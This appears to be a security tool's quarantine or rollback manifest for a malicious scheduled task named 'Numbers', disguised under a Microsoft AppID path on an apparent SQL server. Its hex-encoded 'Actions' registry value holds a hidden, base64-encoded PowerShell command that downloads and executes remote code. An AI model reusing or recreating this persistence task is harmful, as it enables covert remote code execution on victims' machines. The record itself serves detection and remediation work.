[files]
Total=2

[cmd]
numSections=17
1=FILE_BASED VERB_FILE_COPY OBJ_FILE 1
Total=20
2=FILE_BASED VERB_FILE_COPY OBJ_FILE 2
3=REGISTRY_BASED VERB_RESTORE_REG_VALUE OBJ_REG_VALUE 3
4=REGISTRY_BASED VERB_RESTORE_REG_VALUE OBJ_REG_VALUE 4
5=REGISTRY_BASED VERB_RESTORE_REG_VALUE OBJ_REG_VALUE 5
6=REGISTRY_BASED VERB_RESTORE_REG_VALUE OBJ_REG_VALUE 6
7=REGISTRY_BASED VERB_RESTORE_REG_VALUE OBJ_REG_VALUE 7
8=REGISTRY_BASED VERB_RESTORE_REG_VALUE OBJ_REG_VALUE 8
9=REGISTRY_BASED VERB_RESTORE_REG_VALUE OBJ_REG_VALUE 9
10=REGISTRY_BASED VERB_RESTORE_REG_VALUE OBJ_REG_VALUE 10
11=REGISTRY_BASED VERB_RESTORE_REG_VALUE OBJ_REG_VALUE 11
12=REGISTRY_BASED VERB_RESTORE_REG_VALUE OBJ_REG_VALUE 12
13=REGISTRY_BASED VERB_RESTORE_REG_VALUE OBJ_REG_VALUE 13
14=REGISTRY_BASED VERB_RESTORE_REG_VALUE OBJ_REG_VALUE 14
15=REGISTRY_BASED VERB_RESTORE_REG_VALUE OBJ_REG_VALUE 15
16=REGISTRY_BASED VERB_RESTORE_REG_VALUE OBJ_REG_VALUE 16
17=REGISTRY_BASED VERB_RESTORE_REG_VALUE OBJ_REG_VALUE 17
18=REGISTRY_BASED VERB_RESTORE_REG_KEY OBJ_REG_METADATA 3
19=REGISTRY_BASED VERB_RESTORE_REG_KEY OBJ_REG_METADATA 4
20=REGISTRY_BASED VERB_RESTORE_REG_KEY OBJ_REG_METADATA 14

[1]
name=powershell.exe.bak
orig=%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe
DateA=2018/09/15 00:14:14
SD=O:S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464G:S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464D:PAI(A;;FA;;;S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464)(A;;0x1200a9;;;BA)(A;;0x1200a9;;;SY)(A;;0x1200a9;;;BU)(A;;0x1200a9;;;AC)(A;;0x1200a9;;;S-1-15-2-2)S:AI(AU;SAFA;DCLCRPCRSDWDWO;;;WD)
attrib=32
DateC=2018/09/15 00:14:14
DateM=2018/09/15 00:14:14
hash=BB1F87E7

[2]
name=Numbers.bak
orig=%SystemRoot%\System32\Tasks\Microsoft\Windows\AppID\Numbers
DateA=2024/06/17 22:10:50
SD=O:BAG:S-1-5-21-3339660976-4175652973-1130352044-513D:AI(A;;FR;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)
attrib=32
DateC=2024/06/17 22:10:50
DateM=2024/06/17 22:10:50
hash=2F24A70D

[reg]
Total=15

[3]
hive=HKLM
type=REG_SZ
redir=0
empty=-1
DateM=2024/06/17 22:10:50
SD=O:SYG:SYD:P(A;OICI;CCSWRPSDRC;;;BA)(A;OICI;KA;;;SY)
key=SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{067D2066-2A57-4984-B932-8E01B8EBB79E}
param=
data=
dataDecoded=
hash=00000000

[4]
hive=HKLM
type=REG_SZ
redir=0
empty=-1
DateM=2024/06/18 06:57:44
SD=O:SYG:SYD:P(A;OICI;CCSWRPSDRC;;;BA)(A;OICI;KA;;;SY)
key=SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{067D2066-2A57-4984-B932-8E01B8EBB79E}
param=
data=
dataDecoded=
hash=00000000

[5]
hive=HKLM
type=REG_SZ
redir=0
empty=0
key=SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{067D2066-2A57-4984-B932-8E01B8EBB79E}
param=Path
data=\u005C\u004D\u0069\u0063\u0072\u006F\u0053\u006F\u0066\u0074\u005C\u0057\u0069\u006E\u0064\u006F\u0077\u0073\u005C\u0041\u0070\u0070\u0049\u0044\u005C\u004E\u0075\u006D\u0062\u0065\u0072\u0073
dataDecoded=\MicroSoft\Windows\AppID\Numbers
hash=42E06AFE

[6]
hive=HKLM
type=REG_BINARY
redir=0
empty=0
key=SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{067D2066-2A57-4984-B932-8E01B8EBB79E}
param=Hash
data=FF1B85F46B15CEF2A58B4D640C6B491B4BB2380B8333A3E55FA36995086CAC27
dataDecoded=FF1B85F46B15CEF2A58B4D640C6B491B4BB2380B8333A3E55FA36995086CAC27
hash=1FACF653

[7]
hive=HKLM
type=REG_DWORD
redir=0
empty=0
key=SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{067D2066-2A57-4984-B932-8E01B8EBB79E}
param=Schema
data=65538
dataDecoded=65538
hash=D17F487D

[8]
hive=HKLM
type=REG_SZ
redir=0
empty=0
key=SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{067D2066-2A57-4984-B932-8E01B8EBB79E}
param=Date
data=\u0032\u0030\u0032\u0034\u002D\u0030\u0036\u002D\u0031\u0037\u0054\u0032\u0032\u003A\u0031\u0030\u003A\u0035\u0030
dataDecoded=2024-06-17T22:10:50
hash=350A6C35

[9]
hive=HKLM
type=REG_SZ
redir=0
empty=0
key=SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{067D2066-2A57-4984-B932-8E01B8EBB79E}
param=Author
data=\u0053\u0051\u004C\u0053\u0045\u0052\u0056\u0045\u0052\u005C\u0041\u0064\u006D\u0069\u006E\u0069\u0073\u0074\u0072\u0061\u0074\u006F\u0072
dataDecoded=SQLSERVER\Administrator
hash=7CEE6EAC

[10]
hive=HKLM
type=REG_SZ
redir=0
empty=0
key=SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{067D2066-2A57-4984-B932-8E01B8EBB79E}
param=URI
data=\u005C\u004D\u0069\u0063\u0072\u006F\u0053\u006F\u0066\u0074\u005C\u0057\u0069\u006E\u0064\u006F\u0077\u0073\u005C\u0041\u0070\u0070\u0049\u0044\u005C\u004E\u0075\u006D\u0062\u0065\u0072\u0073
dataDecoded=\MicroSoft\Windows\AppID\Numbers
hash=42E06AFE

[11]
hive=HKLM
type=REG_BINARY
redir=0
empty=0
key=SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{067D2066-2A57-4984-B932-8E01B8EBB79E}
param=Triggers
data=17000000000000000107060000001100006C711803C1DA010007060000001100FFFFFFFFFFFFFFFF3821424248484848B52AAE32484848480E0000004848484841007500740068006F0072000000484800000000484848480048484848484848004848484848484805000000484848480C000000484848480101000000000005120000004848484800000000484848482C0000004848484858020000100E000080F40300FFFFFFFF0700000000000000000000000000000000000000000000000000000048484848DDDD0000000000000107060000001100006C711803C1DA010000000000000000000000000000000000000000000000000000000000000000201C000000000000FFFFFFFF0000000000000000000000000001404601000000000000007A9D00000000000048484848
dataDecoded=17000000000000000107060000001100006C711803C1DA010007060000001100FFFFFFFFFFFFFFFF3821424248484848B52AAE32484848480E0000004848484841007500740068006F0072000000484800000000484848480048484848484848004848484848484805000000484848480C000000484848480101000000000005120000004848484800000000484848482C0000004848484858020000100E000080F40300FFFFFFFF0700000000000000000000000000000000000000000000000000000048484848DDDD0000000000000107060000001100006C711803C1DA010000000000000000000000000000000000000000000000000000000000000000201C000000000000FFFFFFFF0000000000000000000000000001404601000000000000007A9D00000000000048484848
hash=E44438A9

[12]
hive=HKLM
type=REG_BINARY
redir=0
empty=0
key=SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{067D2066-2A57-4984-B932-8E01B8EBB79E}
param=Actions
data=03000C00000041007500740068006F0072006666000000001400000070006F007700650072007300680065006C006C00BA0100002D0077002000680069006400640065006E0020002D0065002000530051004200460041004600670041004B00410042004F0041004700550041006400770041007400410045003800410059006700420071004100470055004100590077004200300041004300410041005500770042003500410048004D0041006400410042006C0041004700300041004C00670042004F004100470055004100640041004100750041004600630041005A00510042006900410045004D004100620041004200700041004700550041006200670042003000410043006B0041004C006700420045004100470038004100640077004200750041004700770041006200770042006800410047005100410055007700420030004100480049004100610051004200750041004700630041004B00410041006E004100470067004100640041004200300041004800410041004F0067004100760041004300380041005A0041004100750041004400410041004D004100410077004100440041004100620077004100750041004800670041006500510042003600410044006F0041004F0041004100340041004300380041006100770041006E00410043006B004100000000000000
dataDecoded=03000C00000041007500740068006F0072006666000000001400000070006F007700650072007300680065006C006C00BA0100002D0077002000680069006400640065006E0020002D0065002000530051004200460041004600670041004B00410042004F0041004700550041006400770041007400410045003800410059006700420071004100470055004100590077004200300041004300410041005500770042003500410048004D0041006400410042006C0041004700300041004C00670042004F004100470055004100640041004100750041004600630041005A00510042006900410045004D004100620041004200700041004700550041006200670042003000410043006B0041004C006700420045004100470038004100640077004200750041004700770041006200770042006800410047005100410055007700420030004100480049004100610051004200750041004700630041004B00410041006E004100470067004100640041004200300041004800410041004F0067004100760041004300380041005A0041004100750041004400410041004D004100410077004100440041004100620077004100750041004800670041006500510042003600410044006F0041004F0041004100340041004300380041006100770041006E00410043006B004100000000000000
hash=14A7E704

[13]
hive=HKLM
type=REG_BINARY
redir=0
empty=0
key=SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{067D2066-2A57-4984-B932-8E01B8EBB79E}
param=DynamicInfo
data=03000000522132E33DC1DA0106A8F6D280C1DA01000000000100000060280F7E87C1DA01
dataDecoded=03000000522132E33DC1DA0106A8F6D280C1DA01000000000100000060280F7E87C1DA01
hash=2DFAAA81

[14]
hive=HKLM
type=REG_SZ
redir=0
empty=-1
DateM=2024/06/17 22:10:50
SD=O:SYG:SYD:P(A;OICI;CCSWRPSDRC;;;BA)(A;OICI;KA;;;SY)
key=SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\AppID\Numbers
param=
data=
dataDecoded=
hash=00000000

[15]
hive=HKLM
type=REG_BINARY
redir=0
empty=0
key=SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\AppID\Numbers
param=SD
data=01000480B4000000C400000000000000140000000200A00007000000001018009F011F0001020000000000052000000020020000001014009F011F00010100000000000512000000001014008900120001010000000000050B0000000010140089001200010100000000000513000000001014008900120001010000000000051400000000101800FF011F000102000000000005200000002002000000001400890012000101000000000005120000000000000001020000000000052000000020020000010500000000000515000000B02E0FC76D68E3F8ACCD5F4301020000
dataDecoded=01000480B4000000C400000000000000140000000200A00007000000001018009F011F0001020000000000052000000020020000001014009F011F00010100000000000512000000001014008900120001010000000000050B0000000010140089001200010100000000000513000000001014008900120001010000000000051400000000101800FF011F000102000000000005200000002002000000001400890012000101000000000005120000000000000001020000000000052000000020020000010500000000000515000000B02E0FC76D68E3F8ACCD5F4301020000
hash=B70678AC

[16]
hive=HKLM
type=REG_SZ
redir=0
empty=0
key=SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\AppID\Numbers
param=Id
data=\u007B\u0030\u0036\u0037\u0044\u0032\u0030\u0036\u0036\u002D\u0032\u0041\u0035\u0037\u002D\u0034\u0039\u0038\u0034\u002D\u0042\u0039\u0033\u0032\u002D\u0038\u0045\u0030\u0031\u0042\u0038\u0045\u0042\u0042\u0037\u0039\u0045\u007D
dataDecoded={067D2066-2A57-4984-B932-8E01B8EBB79E}
hash=474FB04D

[17]
hive=HKLM
type=REG_DWORD
redir=0
empty=0
key=SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\AppID\Numbers
param=Index
data=3
dataDecoded=3
hash=6DD28E9B